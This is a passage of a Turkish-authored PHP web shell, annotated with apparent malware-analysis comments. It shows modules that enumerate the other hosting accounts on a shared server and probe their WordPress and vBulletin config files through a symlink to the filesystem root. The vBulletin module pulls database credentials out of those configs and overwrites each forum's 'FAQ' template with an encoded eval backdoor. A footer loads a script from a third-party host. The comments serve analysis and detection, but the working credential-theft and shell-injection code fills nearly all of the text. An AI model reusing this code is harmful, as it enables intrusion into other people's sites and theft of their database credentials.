  3401. <table align='center' width='40%'><td> Domainler </td><td> config </td><td> Sonuç </td>";
  3402. flush();
  3403. flush();
  // wp.txt is truncated and rewritten on every listing request.
  3404. $f = fopen('wp.txt','w');
  3405. foreach($d00m as $dom){
  3406. if(eregi('zone',$dom)){
  3407. preg_match_all('#zone "(.*)"#',$dom,$domsws);
  3408. if(strlen(trim($domsws[1][0])) >2){
  // The hosting account is taken from the owner of /etc/valiases/<domain>.
  3409. $user = posix_getpwuid(@fileowner('/etc/valiases/'.$domsws[1][0]));
  // Three candidate locations are probed over HTTP beneath <base>/sym/root/.
  // NOTE(review): presumably sym/root is a link to the filesystem root created elsewhere in this
  // file - confirm. If so, the read path depends on the web server following a link owned by one
  // account into another account's home (Apache's SymLinksIfOwnerMatch refuses that) and on the
  // target config file being readable by the web server.
  3410. $wpl=$pageURL.'/sym/root/home/'.$user['name'].'/public_html/wp-config.php';
  3411. $wpp=get_headers($wpl);
  3412. $wp=$wpp[0];
  3413. $wp2=$pageURL.'/sym/root/home/'.$user['name'].'/public_html/blog/wp-config.php';
  3414. $wpp2=get_headers($wp2);
  3415. $wp12=$wpp2[0];
  3416. $wp3=$pageURL.'/sym/root/home/'.$user['name'].'/public_html/wp/wp-config';
  3417. $wpp3=get_headers($wp3);
  3418. $wp13=$wpp3[0];
  // $pos is assigned but never read in this block.
  3419. $pos = strpos($wp,'200');
  3420. $config='&nbsp;';
  // strpos(...) == true holds only when "200" is found at a non-zero offset of the status line.
  3421. if (strpos($wp,'200') == true )
  3422. {
  3423. $config= $wpl;
  3424. }
  3425. elseif (strpos($wp12,'200') == true)
  3426. {
  3427. $config= $wp2;
  3428. }
  3429. elseif (strpos($wp13,'200') == true)
  3430. {
  3431. $config= $wp3;
  3432. }
  3433. else
  3434. {
  3435. continue;
  3436. }
  3437. flush();
  3438. $dom = $domsws[1][0];
  // One "location||domain" record per line; this is the format phase 2 splits on.
  3439. $w = fwrite($f,"$config||$dom
  3440. ");
  3441. if($w){$r = '<b style="color: #006600">Bulundu</b>';}else{$r = '<b style="color:red">Hatalý ! bulunamadý.</b>';}
  3442. echo '<tr><td><a href=http://www.'.$domsws[1][0].'>'.$domsws[1][0]."</a></td>
  3443. <td><a href='$config'>config</a></td><td>".$r.'</td></tr>';
  3444. flush();
  3445. flush();
  3446. flush();
  3447. }
  3448. }
  3449. }
  3450. }
  3451. }
  // Analyst note: handler for ?id=vb, the vBulletin module of this web shell.
  // As written it needs PHP 5.x: ereg()/eregi() and the mysql_* functions were removed in PHP 7.0.
  // A plain request builds a target list in vb.txt; a POST carrying field "s" replays that list
  // and overwrites the stored template titled 'FAQ' in each forum database with text that
  // contains an eval(gzinflate(base64_decode(...))) expression.
  // Indicators visible here: named.txt and vb.txt next to the script, self-requests to
  // <base>/sym/root/home/<user>/.../includes/config.php, and a row in the `template` table whose
  // content contains eval(gzinflate(base64_decode.
  // $pageURL and $pg are set outside this view.
  3452. if ($_GET[id]=='vb'){
  // Phase 2: runs only when the form below was submitted.
  3453. if(isset($_POST['s'])){
  3454. $file = @file_get_contents('vb.txt');
  3455. $ex   = explode("
  3456. ",$file);
  3457. echo "<div class='tmp'><table align='center' width='40%'><td> domin </td><td> config </td><td> Sonuç </td>";
  3458. foreach ($ex as $exp){
  // Each record has the form "config-location||domain", as written by phase 1.
  3459. $es   = explode('||',$exp);
  3460. $config = $es[0];
  3461. $domin = $es[1];
  3462. $domins = trim($domin).'';
  3463. $readconfig  = @file_get_contents(trim($config));
  3464. if(ereg('vBulletin',$readconfig)){
  // Database settings are cut out of the config text with ex() (defined later in this file).
  3465. $db      =  ex($readconfig,'$config[\'Database\'][\'dbname\'] = \'',"';");
  3466. $userdb  =  ex($readconfig,'$config[\'MasterServer\'][\'username\'] = \'',"';");
  3467. $pass    =  ex($readconfig,'$config[\'MasterServer\'][\'password\'] = \'',"';");
  3468. $con     = @mysql_connect('localhost',$userdb,$pass);
  3469. $db      = @mysql_select_db($db,$con);
  // $shell is an opaque base64 blob; the wrapper built below passes it through base64_decode and
  // gzinflate before eval. Its decoded content is not shown on this page.
  3470. $shell   = 'bVDPS8MwFL4L/g+vYZAWdPPiaUv14kAQFKqnUUqapjSYNKFJxCn7322abgzcIfDyvl+P7/qKs04D3tS5sJ96MMJ9b+ohDw8vTWcq31PF02yJp/WqzvEaZk2rBwWUOaF7ghAo7jrdEGS0dQh4z9zecIKUl04YOrhV4N821FEEwZQgb6SmDR8QiObsdxYheuMdRKNWSH5UxtmKn3G+v0P5TIxgNTqhWWR9rYSLAXH/RaUfgY8pbVROZ4VI0aawqN5ei/cdDlRcAiFwJEIGv4HyyLTZp4tq+/zyVOxwOASXO+yUqUI6Lm/gHxiBLDic6o62UHjGuLWQJEko99T9Gg7ApeUXJFsq5EX+AR7yPw==';
  3471. $crypt  = "{\${eval(gzinflate(base64_decode(\'";
  3472. $crypt .= "$shell";
  3473. $crypt .= "\')))}}{\${exit()}}</textarea>";
  // The table name `template` is hard-coded and only the row titled 'FAQ' is replaced.
  // The status text below names search.php as the page where the change takes effect.
  3474. $sqlfaq = "UPDATE template SET template ='".$crypt."' WHERE title ='FAQ'";
  3475. $query  = @mysql_query($sqlfaq,$con);
  3476. if ($query){$r = '<b style="color: #006600">Succeed</b> shell in search.php';}
  3477. else
  3478. {
  3479. $r = '<b style="color:red">failed</b>';
  3480. }
  3481. $domins = trim($domin).'';
  3482. echo "<tr>
  3483. <td><a target='_blank' href='http://$domins'>$domin</a></td>
  3484. <td><a target='_blank' href='$config'>config</a></td><td>".$r.'</td></tr>';
  3485. }else{
  3486. echo "<tr>
  3487. <td><a target='_blank' href='http://$domins'>$domin</a></td>
  3488. <td><a target='_blank' href='http://$config'>config</a></td><td><b style='color:red'>failed2</b></td></tr>";
  3489. }
  3490. }
  3491. die();
  3492. }
  // Phase 1: build the target list. Zone data comes from named.txt when it exists, otherwise
  // from /etc/named.conf.
  3493. if(!is_file('named.txt')){
  3494. $d00m = file('/etc/named.conf');
  3495. }else{
  3496. $d00m = file('named.txt');
  3497. }
  3498. if(!$d00m)
  3499. {
  // No zone data: redirect to ?sws=read, which is handled outside this view.
  3500. die ("<meta http-equiv='refresh' content='0; url=?sws=read'/>");
  3501. }
  3502. else
  3503. {
  3504. echo "<div class='tmp'>
  3505. <form method='POST' action='$pg?id=vb'>
  3506. <input type='submit' value='Inject shell' />
  3507. <input type='hidden' value='1' name='s' />
  3508. </form>
  3509. <br /><br />
  3510. <table align='center' width='40%'><td> Domainler </td><td> config </td><td> Sonuç </td>";
  // vb.txt is truncated and rewritten on every listing request.
  3511. $f = fopen('vb.txt','w');
  3512. foreach($d00m as $dom){
  3513. if(eregi('zone',$dom)){
  3514. preg_match_all('#zone "(.*)"#',$dom,$domsws);
  3515. if(strlen(trim($domsws[1][0])) >2){
  // The hosting account is taken from the owner of /etc/valiases/<domain>.
  3516. $user = posix_getpwuid(@fileowner('/etc/valiases/'.$domsws[1][0]));
  // Three candidate locations are probed over HTTP beneath <base>/sym/root/. Unlike the
  // WordPress handler, these paths carry no public_html component.
  // NOTE(review): presumably sym/root is a link to the filesystem root created elsewhere in this
  // file - confirm.
  3517. $wpl=$pageURL.'/sym/root/home/'.$user['name'].'/includes/config.php';
  3518. $wpp=get_headers($wpl);
  3519. $wp=$wpp[0];
  3520. $wp2=$pageURL.'/sym/root/home/'.$user['name'].'/vb/includes/config.php';
  3521. $wpp2=get_headers($wp2);
  3522. $wp12=$wpp2[0];
  3523. $wp3=$pageURL.'/sym/root/home/'.$user['name'].'/forum/includes/config.php';
  3524. $wpp3=get_headers($wp3);
  3525. $wp13=$wpp3[0];
  // $pos is assigned but never read in this block.
  3526. $pos = strpos($wp,'200');
  3527. $config='&nbsp;';
  // strpos(...) == true holds only when "200" is found at a non-zero offset of the status line.
  3528. if (strpos($wp,'200') == true )
  3529. {
  3530. $config= $wpl;
  3531. }
  3532. elseif (strpos($wp12,'200') == true)
  3533. {
  3534. $config= $wp2;
  3535. }
  3536. elseif (strpos($wp13,'200') == true)
  3537. {
  3538. $config= $wp3;
  3539. }
  3540. else
  3541. {
  3542. continue;
  3543. }
  3544. flush();
  3545. $dom = $domsws[1][0];
  // One "location||domain" record per line; this is the format phase 2 splits on.
  3546. $w = fwrite($f,"$config||$dom
  3547. ");
  3548. if($w){$r = '<b style="color: #006600">Bulundu</b>';}else{$r = '<b style="color:red">Bulunamadý Hatalý</b>';}
  3549. echo '<tr><td><a href=http://www.'.$domsws[1][0].'>'.$domsws[1][0]."</a></td>
  3550. <td><a href='$config'>config</a></td><td>".$r.'</td></tr>';
  3551. flush();
  3552. }
  3553. }
  3554. }
  3555. }
  3556. }
  // Analyst note: returns the part of $text that lies between the first occurrence of $a and
  // the next occurrence of $b. The handlers earlier in this file use it to cut database
  // settings out of fetched config files.
  // When $a does not occur in $text, index 1 of the first split does not exist.
  // NOTE(review): presumably the result is then an empty string on the PHP 5 runtimes this file
  // targets - confirm before relying on it in analysis tooling.
  3557. function ex($text,$a,$b){
  3558. $explode = explode($a,$text);
  3559. $explode = explode($b,$explode[1]);
  3560. return $explode[0];
  3561. }
  // Analyst note: page footer. The first echo prints an author credit that links to an
  // external site.
  3562. echo '   <tr align="center" valign="top">
  3563.      <td><font color="white"><center>Coded by MecTruy <a href="http://www.imhatimi.org" rel="dofollow" title="Bypass Shell">http://www.imhatimi.org</a></center></font></td>
  3564.      </tr>';
  // The second echo makes every browser that renders this page load sayac.js from a third-party
  // host. NOTE(review): "sayac" is Turkish for "counter"; presumably this reports where the
  // script is installed to whoever controls that host - confirm against proxy or DNS logs.
  // Both host names in this footer are indicators tied to this sample.
  3565. echo '<SCRIPT SRC=http://sellukaweb.com/sayac.js></SCRIPT>';